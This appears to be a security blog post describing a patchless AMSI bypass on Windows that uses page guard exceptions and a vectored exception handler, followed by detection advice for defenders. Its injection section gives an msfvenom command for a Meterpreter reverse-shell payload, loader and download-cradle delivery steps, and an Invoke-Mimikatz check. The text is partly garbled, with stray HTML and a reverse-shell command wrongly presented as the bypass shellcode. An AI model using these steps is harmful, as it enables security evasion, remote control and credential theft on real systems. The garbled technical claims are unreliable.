Patchless AMSI Bypass via Page Guard Exceptions: A Deep Dive into Next-Gen Evasion + Video

Listen to this Post

Featured Image

Introduction:

The Antimalware Scan Interface (AMSI) has long been a cornerstone of Windows security, scrutinizing script and .NET content before execution. However, a new generation of evasion techniques is rendering traditional memory patching obsolete, with the “Patchless AMSI Bypass via Page Guard Exceptions” leading the charge. This method leverages Windows’ native Vectored Exception Handling (VEH) and memory page guard exceptions to hijack the `AmsiScanBuffer` function’s control flow, forcing an early return with a `AMSI_RESULT_CLEAN` status without ever writing a single byte to amsi.dll.

Learning Objectives:

Understand the fundamental mechanics of how Page Guard exceptions and Vectored Exception Handlers (VEH) can be exploited to intercept and manipulate the `AmsiScanBuffer` function.
Implement a patchless AMSI bypass in both shellcode and Rust, analyzing the step-by-step process of setting page guard traps and hijacking the call stack.
Explore detection strategies and mitigation tactics that blue teams can deploy to identify and block this sophisticated evasion technique.

1. Understanding the Core Mechanics: Page Guard Exceptions

The core of this technique, as detailed in research by ShigShag, is a clever abuse of Windows memory page permissions. Instead of directly patching the `amsi.dll` in memory (a common detection signature), this method turns the memory page hosting the `AmsiScanBuffer` function into a trap.

How It Works:

The technique involves a two-stage exception-handling process:

Step 1: Setting the Trap

A Vectored Exception Handler (VEH) is registered using AddVectoredExceptionHandler. The memory page containing `AmsiScanBuffer` is then modified to include the `PAGE_GUARD` flag via VirtualProtect. This action does not change the code but ensures that any attempt to execute code on that page triggers a `STATUS_GUARD_PAGE_VIOLATION` exception.

Step 2: Exceptions Hijacking

When a script is submitted to AMSI, the `AmsiScanBuffer` function is called.
1. Guard Page Hit: The first instruction of the function triggers the PAGE_GUARD, causing an exception before any malware scan occurs.
2. Exception Handling: Our registered VEH catches this exception. It checks if the exception occurred at the address of AmsiScanBuffer. If so, it locates the 6th argument on the stack (a pointer to the result variable) and sets its value to `AMSI_RESULT_CLEAN` (0x0).
3. Forced Return: The handler then modifies the stack to force a direct return to the caller, completely skipping the rest of the `AmsiScanBuffer` function.
4. Re-arming the Trap: The handler signals the CPU to throw a `STATUS_SINGLE_STEP` exception on the next instruction. A second pass of the VEH then re-applies the `PAGE_GUARD` protection to the memory page, ensuring the trap is re-armed for the next call.

2. Implementation: From Rust PoC to PowerShell Injection

The practicality of this bypass is proven through working code. The Rust Proof-of-Concept (PoC) by `Whitecat18` provides a clear, modern implementation, while the shellcode version offers flexibility for injection. Below is a high-level guide to testing and understanding the Rust PoC.

Step-by-Step Guide to Using the Rust PoC:

  1. Prerequisites: Ensure you have Rust and Cargo installed.
  2. Clone the Repository: Download the specific codebase from the official GitHub repository.

3. Navigate to the Directory:

cd Rust-for-Malware-Development/AMSI\ BYPASS/Amsi_Page_Guard_Exceptions

4. Execute the PoC: Run the tool with cargo in release mode for optimized performance.

cargo run -r

5. Interpret the Output:

A successful bypass will generate debug output similar to what is shown below. The key lines are `

 Guard hit on AmsiScanBuffer! Patching...` followed by <code>[bash] Bypass works! Result forced to CLEAN</code>.

<h2 style="color: yellow;">3. PowerShell Shellcode Injection: Weaponizing the Bypass</h2>

To execute arbitrary commands, the shellcode version of this bypass can be injected directly into a PowerShell process. This provides a practical method for red teamers to disable AMSI during an engagement.

<h2 style="color: yellow;">Step-by-Step Guide for Injection (Educational Use Only):</h2>

<ol>
<li>Generate Shellcode: Use a tool like `msfvenom` to create position-independent shellcode that implements the page guard bypass.
[bash]
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f powershell
  • Integrate with Loader: Embed the generated payload into a shellcode loader or injection script. The shellcode should perform the following steps as detailed in the original research: resolve ntdll.dll, get the address of RtlAddVectoredExceptionHandler, set up the handler, locate AmsiScanBuffer, and apply PAGE_GUARD.
  • Execute Action: Once the loader is run (e.g., via a macro, download cradle, or as a standalone executable), it will inject the shellcode into the target process. The final output should indicate AMSI is disabled and the reverse shell is active.
    [bash] AmsiScanBuffer found!
    [bash] Guard page set on AmsiScanBuffer memory.
    [bash] Vectored Exception Handler registered!
    [bash] AMSI Bypass Active!
    
  • Verify Bypass: Try to run a known malicious string in the affected PowerShell console.
    Invoke-Mimikatz
    

    Instead of being blocked by AMSI, the command may execute.

  • 4. Linux Equivalent: Exception Handling Evasion

    While AMSI is a Windows-specific technology, the underlying concept of using exception handling to bypass security controls has parallels in Linux environments. The `sigaction()` system call with `SA_SIGINFO` can be used similarly to divert execution flow.

    For educational context, a Linux process can set a trap using `mprotect()` to remove PROT_EXEC, causing a SIGSEGV. A custom handler can then manipulate the context before the OS would normally block execution, echoing the “patchless” philosophy of dynamic control-flow hijacking.

    1. Detection and Mitigation: How Blue Teams Can Respond

    Defending against such a stealthy attack requires moving beyond signature-based detection. Here are three core techniques to hunt for and mitigate this bypass.

    Monitor API Calls for Anomalies: Log and audit calls to `VirtualProtect` and `AddVectoredExceptionHandler` from non-standard processes. A PowerShell process setting page guard protections on memory should be treated as highly suspicious immediately.
    Hunt for VEH Registration: Vectored Exception Handlers are not commonly used by legitimate scripts. Use tools like API Monitor or develop an EDR rule to detect the dynamic registration of new VEH callbacks, especially for `amsi.dll` or `ntdll.dll` functions.
    Advanced Command Line Logging: Enable PowerShell’s ScriptBlock Logging (Event ID 4104) and Module Logging. This will log the deobfuscated script content before it is passed to AMSI. While the bypass may neutralize AMSI, the `Invoke-Mimikatz` command will still appear in the logs if they are sent to a remote collector before the bypass is fully active.

    What Undercode Say:

    The shift from memory patching to control-flow hijacking via VEH represents a major evolution in endpoint evasion, requiring blue teams to rethink detection logic.
    The most resilient defense against these attacks is a layered approach that combines host-based detection (API monitoring) with centralized logging and endpoint analytics.
    As offensive techniques become more sophisticated, the industry’s reliance on prevention will inevitably shift toward faster detection and automated incident response.

    Prediction:

    As security vendors quickly adapt to generic page guard abuses, the future of AMSI bypasses will lie in exploiting more obscure, undocumented exception types or integrating ROP (Return-Oriented Programming) chains directly within the exception handling context. This will create a complex, moving target for defenders.

    ▶️ Related Video (82% Match):

    🎯Let’s Practice For Free:

    IT/Security Reporter URL:

    Reported By: Omar Aljabr – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky